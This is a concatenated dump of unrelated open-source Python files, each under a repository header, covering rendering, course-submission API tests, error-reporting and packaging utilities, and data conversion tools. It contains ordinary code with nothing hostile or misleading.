# perspective_transforms = camera_utils.perspective(image_width / image_height,
# fov_y, near_clip, far_clip)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_ext, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, _ = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [99999999] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
filler_homo = tf.ones(shape=[pixel_attributes.shape[0], pixel_attributes.shape[1], pixel_attributes.shape[2], 1])
pixel_attributes = tf.concat([pixel_attributes, filler_homo], axis=3)
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, -1, 4])
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.matmul(mtx_ext, pixel_attributes)
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, image_height, image_width, 4])
depth_map = pixel_attributes[:, :, :, 2]
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
depth_map = tf.reverse(depth_map, axis=[1])
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return depth_map, pixel_mask |
cupyx/fallback_mode/__init__.py | prkhrsrvstv1/cupy | 6,180 | 12776416 | <reponame>prkhrsrvstv1/cupy
from cupy import _util
# Attributes and Methods for fallback_mode
# Auto-execute numpy method when corresponding cupy method is not found
# "NOQA" to suppress flake8 warning
from cupyx.fallback_mode.fallback import numpy # NOQA
_util.experimental('cupyx.fallback_mode.numpy')
|
tick/solver/history/__init__.py | sumau/tick | 411 | 12776419 | # License: BSD 3 clause
# import tick.base
from .history import History
__all__ = ["History"]
|
tests/test_api.py | chrononyan/ok | 148 | 12776431 | <filename>tests/test_api.py
import datetime as dt
import dateutil.parser
import json
import random
from server.models import (Client, db, Assignment, Backup, Course, User,
Version, Group, )
from server.utils import encode_id
from tests import OkTestCase
class TestApi(OkTestCase):
def _test_backup(self, submit, delay=10, success=True):
self.setup_course()
email = self.user1.email
self.login(email)
user = User.lookup(email)
course = self.course
assignment = self.assignment
# Offset the due date & lock_dates
assignment.due_date = assignment.due_date + dt.timedelta(hours=delay)
assignment.lock_date = assignment.lock_date + dt.timedelta(days=delay)
okversion = Version(name="ok-client", current_version="v1.5.0",
download_link="http://localhost/ok")
db.session.add(okversion)
db.session.commit()
data = {
'assignment': assignment.name,
'messages': {
'file_contents': {
'hog.py': 'print("Hello world!")'
}
},
'submit': submit,
}
response = self.client.post('/api/v3/backups/?client_version=v1.5.0',
data=json.dumps(data),
headers=[('Content-Type', 'application/json')])
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
assert backup is not None
if success or not submit:
assert response.json['data'] == {
'email': email,
'key': encode_id(backup.id),
'course': {
'id': course.id,
'offering': course.offering,
'display_name': course.display_name,
'active': course.active,
'timezone': 'America/Los_Angeles'
},
'assignment': assignment.name
}
self.assert_200(response)
if not success:
self.assert_403(response)
submit = False
assert response.json['data'] == {
'data': {
'backup': True,
'late': True
}
}
assert backup.assignment == assignment
assert backup.submitter_id == user.id
assert len(backup.messages) == len(data['messages'])
assert backup.submit == submit
def test_backup(self):
self._test_backup(False)
def test_backup_after_deadline(self):
self._test_backup(False, delay=-2)
def test_submit(self):
self._test_backup(True)
def test_submit_after_deadline(self):
self._test_backup(True, delay=-2, success=False)
def test_api(self):
response = self.client.get('/api/v3/')
self.assert_200(response)
assert response.json['data'] == {
'version': 'v3',
'url': '/api/v3/',
'documentation': 'https://okpy.github.io/documentation',
'github': 'https://github.com/okpy/ok'
}
assert response.json['message'] == 'success'
assert response.json['code'] == 200
def test_no_envelope(self):
response = self.client.get('/api/v3/?envelope=false')
self.assert_200(response)
assert 'data' not in response.json
assert 'message' not in response.json
assert 'code' not in response.json
assert response.json['version'] == 'v3'
def test_non_existant_api(self):
response = self.client.get('/api/v3/doesnotexist')
self.assert_404(response)
assert response.json['data'] == {}
assert response.json['code'] == 404
def test_get_backup(self):
self._test_backup(False)
backup = Backup.query.first()
submission_time = (self.assignment.due_date
- dt.timedelta(days=random.randrange(0, 10)))
backup.custom_submission_time = submission_time
response = self.client.get('/api/v3/backups/{}/'.format(backup.hashid))
self.assert_200(response)
course = backup.assignment.course
user_json = {
"email": backup.submitter.email,
"id": encode_id(backup.submitter_id),
}
response_json = response.json['data']
time_threshold = dt.timedelta(seconds=5)
self.assertAlmostEqual(dateutil.parser.parse(response_json['created']),
backup.created,
delta=time_threshold)
self.assertAlmostEqual(dateutil.parser.parse(response_json['submission_time']),
submission_time,
delta=time_threshold)
self.assertAlmostEqual(dateutil.parser.parse(response_json['messages'][0]['created']),
backup.created,
delta=time_threshold)
# Unset timestamps already tested.
del response_json['created']
del response_json['submission_time']
del response_json['messages'][0]['created']
assert response_json == {
"submitter": user_json,
"submit": backup.submit,
"group": [user_json],
"is_late": backup.is_late,
"external_files": [],
"assignment": {
"name": backup.assignment.name,
"course": {
"id": course.id,
"active": course.active,
"display_name": course.display_name,
"offering": course.offering,
"timezone": course.timezone.zone,
},
},
"id": backup.hashid,
"messages": [
{
"kind": "file_contents",
"contents": backup.files(),
},
],
}
def test_bad_hashid(self):
self.setup_course()
response = self.client.get('/api/v3/backups/xyzxyz/')
self.assert_401(response)
assert response.json['data'] == {}
assert response.json['code'] == 401
self.login(self.user1.email)
response = self.client.get('/api/v3/backups/xyzxyz/')
self.assert_404(response)
assert response.json['data'] == {}
assert response.json['code'] == 404
def test_version_api(self):
okversion = Version(name="ok", current_version="v1.5.0",
download_link="http://localhost/ok")
db.session.add(okversion)
ok2version = Version(name="ok2", current_version="v2.5.0",
download_link="http://localhost/ok2")
db.session.add(ok2version)
response = self.client.get('/api/v3/version/')
self.assert_200(response)
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.0",
"download_link": "http://localhost/ok",
"name": "ok"
},
{
"current_version": "v2.5.0",
"download_link": "http://localhost/ok2",
"name": "ok2"
}
]
}
assert response.json['message'] == 'success'
response = self.client.get('/api/v3/version/ok')
self.assert_200(response)
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.0",
"download_link": "http://localhost/ok",
"name": "ok"
}
]
}
self.setup_course()
self.login(self.user1.email)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://localhost/versions/v1.5.1/ok',
})
self.assert_403(response)
self.login(self.staff1.email)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://localhost/versions/v1.5.1/ok',
})
# Staff members do not have permission to edit versions
self.assert_403(response)
self.login(self.admin.email)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://example.com/doesnotexist',
})
self.assert_400(response)
response = self.client.post('/api/v3/version/ok', data={
'current_version': 'v1.5.1',
'download_link': 'http://example.com',
})
self.assert_200(response)
response = self.client.get('/api/v3/version/')
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.1",
"download_link": "http://example.com",
"name": "ok"
},
{
"current_version": "v2.5.0",
"download_link": "http://localhost/ok2",
"name": "ok2"
}
]
}
response = self.client.get('/api/v3/version/ok')
self.assert_200(response)
assert response.json['data'] == {
'results': [
{
"current_version": "v1.5.1",
"download_link": "http://example.com",
"name": "ok"
}
]
}
def test_score_anon(self):
response = self.client.post('/api/v3/score/')
self.assert_401(response)
assert response.json['code'] == 401
def test_score_student(self):
self._test_backup(True)
email = self.user1.email
self.login(email)
user = User.lookup(email)
response = self.client.post('/api/v3/score/')
self.assert_400(response)
assert response.json['code'] == 400
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
data = {'bid': encode_id(backup.id), 'kind': 'Total',
'score': 128.2, 'message': 'wow'}
response = self.client.post('/api/v3/score/', data=data)
self.assert_401(response)
assert response.json['code'] == 401
def test_export_user(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
self.login(self.staff1.email)
backup = Backup.query.filter(Backup.submitter_id == student.id).first()
endpoint = '/api/v3/assignment/{0}/export/{1}'.format(self.assignment.name,
student.email)
response = self.client.get(endpoint)
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 1)
self.assertTrue('submission_time' in backups[0])
self.assertEqual(backups[0]['submission_time'], backups[0]['created'])
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['limit'], 150)
self.assertEqual(response.json['data']['offset'], 0)
self.assertEqual(response.json['data']['has_more'], False)
response = self.client.get(endpoint + "?offset=20&limit=2")
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 0)
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['limit'], 2)
self.assertEqual(response.json['data']['offset'], 20)
self.assertEqual(response.json['data']['has_more'], False)
def test_export_final(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
backup = Backup.query.filter(Backup.submitter_id == student.id).first()
endpoint = '/api/v3/assignment/{0}/submissions/'.format(self.assignment.name)
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.staff1.email)
response = self.client.get(endpoint)
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 1)
self.assertEqual(backups[0]['is_late'], False)
self.assertEqual(len(backups[0]['group']), 1)
self.assertEqual(backups[0]['group'][0]['email'], self.user1.email)
self.assertEqual(len(backups[0]['messages']), 1)
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['has_more'], False)
self.assertEqual(response.json['data']['offset'], 0)
response = self.client.get(endpoint + '?offset=1')
self.assert_200(response)
backups = response.json['data']['backups']
self.assertEqual(len(backups), 0)
self.assertEqual(response.json['data']['count'], 1)
self.assertEqual(response.json['data']['has_more'], False)
self.assertEqual(response.json['data']['offset'], 1)
def test_assignment_api(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
endpoint = '/api/v3/assignment/{0}'.format(self.assignment.name)
# View a public assignment
response = self.client.get(endpoint)
self.assert_200(response)
# Change assignment to be hidden
self.assignment.visible = False
db.session.commit()
response = self.client.get(endpoint)
self.assert_403(response)
self.assignment.visible = True
db.session.commit()
self.login(self.staff1.email)
response = self.client.get(endpoint)
self.assert_200(response)
self.assertEqual(response.json['data']['name'], self.assignment.name)
# Hidden assignment, but should be visible to staff
self.assignment.visible = False
db.session.commit()
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.user1.email)
self.assignment.visible = False
db.session.commit()
response = self.client.get(endpoint)
self.assert_403(response)
def test_group_api(self):
self._test_backup(True)
self.logout()
student = User.lookup(self.user1.email)
Group.invite(self.user1, self.user2, self.assignment)
group = Group.lookup(self.user1, self.assignment)
group.accept(self.user2)
base_api = '/api/v3/assignment/{0}/group/{1}'
endpoint = base_api.format(self.assignment.name, self.user1.email)
response = self.client.get(endpoint)
self.assert_401(response)
self.login(self.user1.email)
response = self.client.get(endpoint)
self.assert_200(response)
members = response.json['data']['members']
self.assertEqual(len(members), 2)
assert 'email' in members[0]['user']
# Make sure user2 can access user1's endpoint
self.login(self.user2.email)
response = self.client.get(endpoint)
self.assert_200(response)
members = response.json['data']['members']
self.assertEqual(len(members), 2)
assert 'email' in members[1]['user']
self.login(self.staff1.email)
response = self.client.get(endpoint)
self.assert_200(response)
members = response.json['data']['members']
self.assertEqual(len(members), 2)
assert 'email' in members[0]['user']
# Login as some random user
self.login(self.user3.email)
response = self.client.get(endpoint)
self.assert_403(response)
# Check for existence of email
response = self.client.get(base_api.format(self.assignment.name, '<EMAIL>'))
self.assert_403(response)
self.login(self.admin.email)
response = self.client.get(base_api.format(self.assignment.name, '<EMAIL>'))
self.assert_404(response)
def test_score_staff(self):
self._test_backup(True)
user = User.lookup(self.user1.email)
self.login(self.staff1.email)
response = self.client.post('/api/v3/score/')
self.assert_400(response)
assert response.json['code'] == 400
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
data = {'bid': encode_id(backup.id), 'kind': 'Total',
'score': 128.2, 'message': 'wow'}
response = self.client.post('/api/v3/score/', data=data)
self.assert_200(response)
assert response.json['code'] == 200
self.logout()
self.login(self.admin.email)
data = {'bid': encode_id(backup.id), 'kind': 'Total',
'score': 128.2, 'message': 'wow'}
response = self.client.post('/api/v3/score/', data=data)
self.assert_200(response)
assert response.json['code'] == 200
def test_comment_staff(self):
self._test_backup(True)
user = User.lookup(self.user1.email)
self.login(self.staff1.email)
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
comment_url = "/api/v3/backups/{}/comment/".format(encode_id(backup.id))
response = self.client.post(comment_url)
self.assert_400(response) # Not all fields present
assert response.json['code'] == 400
data = {'line': 2, 'filename': 'fizzbuzz.py',
'message': 'wow'}
response = self.client.post(comment_url, data=data)
self.assert_200(response)
assert response.json['code'] == 200
self.logout()
self.login(self.admin.email)
data = {'line': 2, 'filename': 'fizzbuzz.py',
'message': 'wow'}
response = self.client.post(comment_url, data=data)
self.assert_200(response)
assert response.json['code'] == 200
# Check that another student is not able to comment
self.login(self.user2.email)
data = {'line': 2, 'filename': 'fizzbuzz.py',
'message': 'wow'}
response = self.client.post(comment_url, data=data)
self.assert_403(response)
assert response.json['code'] == 403
def test_get_comments(self):
self._test_backup(True)
user = User.lookup(self.user1.email)
staff = User.lookup(self.staff1.email)
backup = Backup.query.filter(Backup.submitter_id == user.id).first()
comment_url = "/api/v3/backups/{}/comment/".format(encode_id(backup.id))
comment1 = Comment(
backupid = backup,
author_id = staff.id,
filename = 'fizzbuzz.py',
line = 2,
message = 'hello world'
)
comment2 = Comment(
backupid = backup,
author_id = staff.id,
filename = 'fizzbuzz.py',
line = 5,
message = 'wow'
)
db.session.add(comment1)
db.session.add(comment2)
#check to see if student can view comments on own backup's comments
self.login(self.user1.email)
response = self.client.get(comment_url)
self.assert_200(response)
self.assertEqual(len(response['data']['comments']), 2)
self.assertEqual(response['data']['comments'][0].message, 'hello world')
self.assertEqual(response['data']['comments'][1].message, 'wow')
self.logout()
#check to see if staff can access comments
self.login(self.staff1.email)
response = self.client.get(comment_url)
self.assert_200(response)
self.logout()
#check to see another student can't see others' backup's comments
self.login(self.user2.email)
response = self.client.get(comment_url)
self.assert_403(response)
self.logout()
def test_create_assignment(self):
self.setup_course()
self.login(self.staff1.email)
response = self.client.post("/api/v3/assignment/" + self.course.offering + "/newassignment", json={
'display_name': 'API Test Assignment',
'due_date': '2016-11-07T06:59:59',
'lock_date': '2016-11-08T06:59:59',
})
self.assert200(response)
assignment = Assignment.query.filter_by(name=self.course.offering + '/newassignment').one()
self.assertEqual(assignment.display_name, 'API Test Assignment')
self.assertEqual(assignment.due_date.day, 7)
response = self.client.post("/api/v3/assignment/" + self.course.offering + "/newassignment", json={
'display_name': 'API Test Assignment',
'due_date': '2016-11-10T06:59:59',
'lock_date': '2016-11-11T06:59:59',
})
self.assert200(response)
assignment = Assignment.query.filter_by(name=self.course.offering + '/newassignment').one()
self.assertEqual(assignment.due_date.day, 10)
self.login(self.user1.email)
response = self.client.post("/api/v3/assignment/" + self.course.offering + "/newassignment2", json={
'display_name': 'API Test Assignment',
'due_date': '2016-11-07T06:59:59',
'lock_date': '2016-11-08T06:59:59',
})
self.assert403(response)
assignment = Assignment.query.filter_by(name=self.course.offering + '/newassignment2').one_or_none()
self.assertEqual(assignment, None)
def test_user_api(self):
self._test_backup(True)
self.logout()
student = User.lookup(self.user1.email)
def test_both_endpoints(user):
base_api = '/api/v3/user/{0}'
user1_endpoint = base_api.format(user.email)
current_user_endpoint = base_api.format('')
current = self.client.get(current_user_endpoint)
specific = self.client.get(user1_endpoint)
return current, specific
current, specific = test_both_endpoints(student)
self.assert_401(current)
self.assert_401(specific)
# Should be able to view self
self.login(self.user1.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_200(specific)
members = current.json['data']['participations']
self.assertEqual(len(members), 1)
self.assertEqual(current.json['data'], specific.json['data'])
# Staff don't get permission
self.login(self.staff1.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_403(specific)
# Login as some random user
self.login(self.user3.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_403(specific)
# Admins should have acess
self.login(self.admin.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_200(specific)
self.assertEqual(specific.json['data']['email'], student.email)
# Lab Assistants don't have access
self.login(self.lab_assistant1.email)
current, specific = test_both_endpoints(student)
self.assert_200(current)
self.assert_403(specific)
def test_course_enrollment(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
courses = student.enrollments()
course = courses[0]
student_endpoint = '/api/v3/course/cal/cs61a/sp16/enrollment'
self.login(self.staff1.email)
response = self.client.get(student_endpoint)
self.assert_200(response)
student_emails = [s['email'] for s in response.json['data']['student']]
self.assertEqual(self.user1.email in student_emails, True)
self.login(self.user1.email)
response = self.client.get(student_endpoint)
self.assert_403(response)
def test_course_assignments(self):
self._test_backup(True)
student = User.lookup(self.user1.email)
courses = student.enrollments()
course = courses[0]
student_endpoint = '/api/v3/course/cal/cs61a/sp16/assignments'
anon_response = self.client.get(student_endpoint)
self.assert_200(anon_response)
active_assignments = len([a for a in self.course.assignments if a.active])
self.assertEqual(active_assignments, len(anon_response.json['data']['assignments']))
self.login(self.staff1.email)
auth_response = self.client.get(student_endpoint)
self.assert_200(auth_response)
self.assertEqual(anon_response.json['data'], auth_response.json['data'])
def test_client(self):
self.setup_course()
self.login(self.staff1.email)
db.session.add(Client(
name='Test Client',
description='',
user=self.staff1,
client_id='test_client',
client_secret='secret',
redirect_uris=[],
default_scopes=['all'],
is_confidential=False
))
response = self.client.get('/api/v3/client/test_client')
self.assertEqual(
response.json['data'],
{'allowed_redirects': [], 'client_id': 'test_client', 'client_name': '<NAME>', 'description': '',
'is_confidential': False, 'owner_email': '<EMAIL>'}
)
response = self.client.post('/api/v3/client/test_client/redirect_urls', json={'url': 'test'})
self.assert_200(response)
response = self.client.get('/api/v3/client/test_client')
self.assertEqual(response.json['data']['allowed_redirects'], ['test'])
self.login(self.admin.email)
response = self.client.post('/api/v3/client/test_client/redirect_urls', json={'url': 'test2'})
self.assert_200(response)
response = self.client.get('/api/v3/client/test_client')
self.assertEqual(response.json['data']['allowed_redirects'], ['test', 'test2'])
self.login(self.staff2.email)
response = self.client.post('/api/v3/client/test_client/redirect_urls', json={'url': 'test3'})
self.assert_403(response)
response = self.client.get('/api/v3/client/test_client')
self.assert_403(response)
def test_course_grades(self):
self._test_backup(True)
self.login(self.staff1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.staff2.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.user1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.user6.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.admin.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/grades'
response = self.client.get(endpoint)
self.assert_200(response)
def test_course_roster(self):
self._test_backup(True)
self.login(self.staff1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.staff2.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_200(response)
self.login(self.user1.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.user6.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_403(response)
self.login(self.admin.email)
endpoint = '/api/v3/course/cal/cs61a/sp16/roster'
response = self.client.get(endpoint)
self.assert_200(response)
|
rollbar/examples/flask/app.py | arthurio/pyrollbar | 177 | 12776450 | <filename>rollbar/examples/flask/app.py
# NOTE: pyrollbar requires both `Flask` and `blinker` packages to be installed first
from flask import Flask
from flask import got_request_exception
import rollbar
import rollbar.contrib.flask
app = Flask(__name__)
@app.before_first_request
def init_rollbar():
rollbar.init('ACCESS_TOKEN', environment='development')
# send exceptions from `app` to rollbar, using flask's signal system.
got_request_exception.connect(rollbar.contrib.flask.report_exception, app)
@app.route('/')
def root():
foo()
return '<html><body>Hello World</body></html>'
if __name__ == '__main__':
app.run()
|
qa/L0_stability_steps/check_results.py | MarkMoTrin/model_analyzer | 115 | 12776460 | <filename>qa/L0_stability_steps/check_results.py<gh_stars>100-1000
# Copyright (c) 2021 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import yaml
class TestOutputValidator:
"""
Functions that validate the output
of the test
"""
def __init__(self, config, test_name, analyzer_log):
self._config = config
self._models = config['profile_models']
self._analyzer_log = analyzer_log
check_function = self.__getattribute__(f'check_{test_name}')
if check_function():
sys.exit(0)
else:
sys.exit(1)
def check_steps_stability(self):
"""
Makes sure that there were the same number of
configurations tried in each search iteration.
"""
with open(self._analyzer_log, 'r+') as f:
log_contents = f.read()
logs_for_iteration = log_contents.split(
'Profiling server only metrics...')[1:]
logs_for_model = logs_for_iteration[0].split(
"config search for model:")[1:]
expected_step_counts = []
for model_log in logs_for_model:
expected_step_counts.append(model_log.count('[Search Step]'))
for i in range(1, 4):
logs_for_model = logs_for_iteration[i].split(
"config search for model:")[1:]
for j, model_log in enumerate(logs_for_model):
actual_step_count = model_log.count('[Search Step]')
if abs(actual_step_count - expected_step_counts[j]) > 1:
print("\n***\n*** Expected number of search steps for "
f"{self._models[j]} : {expected_step_counts[j]}."
f"Took {actual_step_count}. \n***")
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f',
'--config-file',
type=str,
required=True,
help='The path to the config yaml file.')
parser.add_argument('-l',
'--analyzer-log-file',
type=str,
required=True,
help='The full path to the analyzer log.')
parser.add_argument('-t',
'--test-name',
type=str,
required=True,
help='The name of the test to be run.')
args = parser.parse_args()
with open(args.config_file, 'r') as f:
config = yaml.safe_load(f)
TestOutputValidator(config, args.test_name, args.analyzer_log_file)
|
custom_components/bhyve/util.py | jdreamerz/bhyve-home-assistant | 122 | 12776468 | from homeassistant.util import dt
def orbit_time_to_local_time(timestamp: str):
if timestamp is not None:
return dt.as_local(dt.parse_datetime(timestamp))
return None
def anonymize(device):
device["address"] = "REDACTED"
device["full_location"] = "REDACTED"
device["location"] = "REDACTED"
return device
|
cx_Freeze/initscripts/SharedLib.py | TechnicalPirate/cx_Freeze | 358 | 12776474 | """
Initialization script for cx_Freeze which behaves similarly to the one for
console based applications but must handle the case where Python has already
been initialized and another DLL of this kind has been loaded. As such it
does not block the path unless sys.frozen is not already set.
"""
import sys
if not hasattr(sys, "frozen"):
sys.frozen = True
sys.path = sys.path[:4]
def run():
pass
|
python_solutions/chapter_08_recursion_and_dynamic_programming/problem_08_08_permutations_with_dups.py | isayapin/cracking-the-coding-interview | 560 | 12776494 | def permutations_with_dups(string):
hash_table = {}
permutations = []
for character in string:
if character in hash_table:
hash_table[character] += 1
else:
hash_table[character] = 1
helper('', hash_table, permutations)
return permutations
def helper(string, hash_table, permutations):
if sum(hash_table.values()) <= 0:
permutations.append(string)
else:
for character in hash_table:
local_hash_table = hash_table.copy()
if local_hash_table[character] <= 1:
local_hash_table.pop(character, None)
else:
local_hash_table[character] -= 1
helper(string + character, local_hash_table, permutations)
|
bin/commands/corpus.py | davidmcclure/open-syllabus-project | 220 | 12776520 |
import os
import click
import csv
import random
import sys
from osp.common import config
from osp.common.utils import query_bar
from osp.corpus.corpus import Corpus
from osp.corpus.models import Document
from osp.corpus.models import Document_Format
from osp.corpus.models import Document_Text
from osp.corpus.jobs import ext_format
from osp.corpus.jobs import ext_text
from peewee import create_model_tables
from prettytable import PrettyTable
@click.group()
def cli():
pass
@cli.command()
def init_db():
"""
Create the database tables.
"""
create_model_tables([
Document,
Document_Format,
Document_Text
], fail_silently=True)
@cli.command()
def insert_documents():
"""
Insert documents in the database.
"""
Document.insert_documents()
@cli.command()
def queue_format():
"""
Queue format extraction tasks in the worker.
"""
for doc in query_bar(Document.select()):
config.rq.enqueue(ext_format, doc.id)
@cli.command()
def queue_text():
"""
Queue text extraction tasks in the worker.
"""
for doc in query_bar(Document.select()):
config.rq.enqueue(ext_text, doc.id)
@cli.command()
def format_counts():
"""
Print a table of file format -> count.
"""
t = PrettyTable(['File Type', 'Doc Count'])
t.align = 'l'
for c in Document_Format.format_counts():
t.add_row(c)
click.echo(t)
@cli.command()
def file_count():
"""
Print the total number of files.
"""
corpus = Corpus.from_env()
click.echo(corpus.file_count)
|
pysph/tools/pysph_to_vtk.py | nauaneed/pysph | 293 | 12776522 | <reponame>nauaneed/pysph
''' convert pysph .npz output to vtk file format '''
from __future__ import print_function
import os
import re
from enthought.tvtk.api import tvtk, write_data
from numpy import array, c_, ravel, load, zeros_like
def write_vtk(data, filename, scalars=None, vectors={'V':('u','v','w')}, tensors={},
coords=('x','y','z'), dims=None, **kwargs):
''' write data in to vtk file
Parameters
----------
data : dict
mapping of variable name to their numpy array
filename : str
the file to write to (can be any recognized vtk extension)
if extension is missing .vts extension is appended
scalars : list
list of arrays to write as scalars (defaults to data.keys())
vectors : dict
mapping of vector name to vector component names to take from data
tensors : dict
mapping of tensor name to tensor component names to take from data
coords : list
the name of coordinate data arrays (default=('x','y','z'))
dims : 3 tuple
the size along the dimensions for (None means x.shape)
**kwargs : extra arguments for the file writer
example file_type=binary/ascii
'''
x = data[coords[0]]
y = data.get(coords[1], zeros_like(x))
z = data.get(coords[2], zeros_like(x))
if dims is None:
dims = array([1,1,1])
dims[:x.ndim] = x.shape
else:
dims = array(dims)
sg = tvtk.StructuredGrid(points=c_[x.flat,y.flat,z.flat],dimensions=array(dims))
pd = tvtk.PointData()
if scalars is None:
scalars = [i for i in data.keys() if i not in coords]
for v in scalars:
pd.scalars = ravel(data[v])
pd.scalars.name = v
sg.point_data.add_array(pd.scalars)
for vec,vec_vars in vectors.items():
u,v,w = [data[i] for i in vec_vars]
pd.vectors = c_[ravel(u),ravel(v),ravel(w)]
pd.vectors.name = vec
sg.point_data.add_array(pd.vectors)
for ten,ten_vars in tensors.items():
vars = [data[i] for i in ten_vars]
tensors = c_[[ravel(i) for i in vars]].T
pd.tensors = tensors
pd.tensors.name = ten
sg.point_data.add_array(pd.tensors)
write_data(sg, filename, **kwargs)
def detect_vectors_tensors(keys):
''' detect the vectors and tensors from given array names
Vectors are identified as the arrays with common prefix followed by
0,1 and 2 in their names
Tensors are identified as the arrays with common prefix followed by
two character codes representing ij indices
(00,01,02,11,12,22) for a symmetric tensor
(00,01,02,10,11,12,20,21,22) for a tensor
Arrays not belonging to vectors or tensors are returned as scalars
Returns scalars,vectors,tensors in a format suitable to be used as arguments
for :py:func:`write_vtk`
'''
d = {}
for k in keys:
d[len(k)] = d.get(len(k), [])
d[len(k)].append(k)
scalars = []
vectors = {}
tensors = {}
for n,l in d.items():
if n<2:
continue
l.sort()
idx = -1
while idx<len(l)-1:
idx += 1
k = l[idx]
# check if last char is 0
if k[-1] == '0':
# check for tensor
if k[-2] == '0':
# check for 9 tensor
ten = []
for i in range(3):
for j in range(3):
ten.append(k[:-2]+str(j)+str(i))
ten.sort()
if l[idx:idx+9] == ten:
tensors[k[:-2]] = ten
idx += 8
continue
# check for symm 6 tensor
ten2 = []
for i in range(3):
for j in range(i+1):
ten2.append(k[:-2]+str(j)+str(i))
ten2.sort()
if l[idx:idx+6] == ten2:
ten = []
for i in range(3):
for j in range(3):
ten.append(k[:-2]+str(min(i,j))+str(max(i,j)))
tensors[k[:-2]] = ten
idx += 5
continue
# check for vector
vec = []
for i in range(3):
vec.append(k[:-1] + str(i))
if l[idx:idx+3] == vec:
vectors[k[:-1]] = vec
idx += 2
continue
scalars.append(k)
return scalars, vectors, tensors
def get_output_details(path):
solvers = {}
if not os.path.isdir(path):
path = os.path.dirname(path)
files = os.listdir(path)
files.sort()
pat = re.compile(r'(?P<solver>.+)_(?P<rank>\d+)_(?P<entity>.+)_(?P<time>[-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?).npz')
matches = [(f,pat.match(f)) for f in files]
files = []
for filename,match in matches:
if match is None:
continue
files.append(filename)
groups = match.groupdict()
solvername = groups['solver']
solver = solvers.get(solvername)
if solver is None:
solver = [set([]),set([]),set([])]
solvers[solvername] = solver
solver[0].add(groups['rank'])
solver[1].add(groups['entity'])
solver[2].add(groups['time'])
# {solver:(entities,procs,times)}
return solvers
def pysph_to_vtk(path, merge_procs=False, skip_existing=True, binary=True):
''' convert pysph output .npz files into vtk format
Parameters
----------
path : str
directory where .npz files are located
merge_procs : bool
whether to merge the data from different procs into a single file
(not yet implemented)
skip_existing : bool
skip files where corresponding vtk already exist
this is useful if you've converted vtk files while a solver is running
only want to convert the newly added files
binary : bool
whether to use binary format in vtk file
The output vtk files are stored in a directory `solver_name` _vtk within
the `path` directory
'''
if binary:
data_mode = 'binary'
else:
data_mode = 'ascii'
if merge_procs is True:
# FIXME: implement
raise NotImplementedError('merge_procs=True not implemented yet')
solvers = get_output_details(path)
for solver, (procs, entities, times) in solvers.items():
print('converting solver:', solver)
dir = os.path.join(path,solver+'_vtk')
if not os.path.exists(dir):
os.mkdir(dir)
procs = sorted(procs)
entities = sorted(entities)
times = sorted(times, key=float)
